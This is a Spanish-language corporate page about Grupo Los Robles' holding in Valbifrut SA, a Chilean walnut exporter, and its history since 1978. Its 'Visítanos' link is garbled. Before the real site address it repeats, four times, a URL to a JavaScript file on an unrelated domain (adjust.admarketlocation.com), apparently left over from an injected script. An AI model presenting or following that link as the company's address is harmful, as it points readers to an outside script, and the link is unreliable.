Agrícola

En el sector agrícola, grupo Los Robles tiene participación en la productora y exportadora de nueces Valbifrut SA. Empresa que comienza sus operaciones el año 1978 con la plantación de los primeros huertos de nogal. A medida que las producciones fueron creciendo comenzaron las exportaciones, iniciándose estas en el año 1990 con la primera venta a Europa.

En 2001, con 11 años de experiencia procesando y exportando nueces a los principales mercados europeos y sudamericanos, y frente al aumento de producción de Chile, Valbifrut amplió y remodeló su planta de procesos convirtiéndola en la más moderna del hemisferio sur hasta hoy.

Tras tres décadas como pionera, formadora y parte de la industria chilena del nogal, Valbifrut continúa siendo productora, exportadora y procesadora por excelencia de nueces al mundo; Valbifrut es la segunda exportadora más grande de Chile enfocando todos los esfuerzos para satisfacer a nuestros clientes, productores y trabajadores.

Visítanos: http://adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&www.valbifrut.cl/

¿Quieres contactarte con nosotros?

Déjanos tus datos y muy pronto nos comunicaremos contigo

Contáctanos